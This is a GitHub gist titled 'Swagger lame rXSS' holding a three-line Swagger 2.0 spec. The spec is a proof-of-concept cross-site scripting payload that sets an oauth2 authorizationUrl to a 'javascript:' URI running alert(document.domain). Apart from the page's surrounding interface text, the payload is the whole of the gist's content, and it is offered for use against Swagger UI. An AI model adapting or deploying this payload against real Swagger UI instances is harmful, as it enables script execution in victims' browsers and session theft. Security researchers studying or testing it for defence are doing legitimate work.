Skip to content

Instantly share code, notes, and snippets.

@0xBADCA7
Created June 16, 2020 14:31
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save 0xBADCA7/00d5fdcf603051b5203d525457440fbb to your computer and use it in GitHub Desktop.
Save 0xBADCA7/00d5fdcf603051b5203d525457440fbb to your computer and use it in GitHub Desktop.
Swagger lame rXSS
swagger: '2.0'
securityDefinitions:
a:
type: oauth2
authorizationUrl: javascript:alert(document.domain)//
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment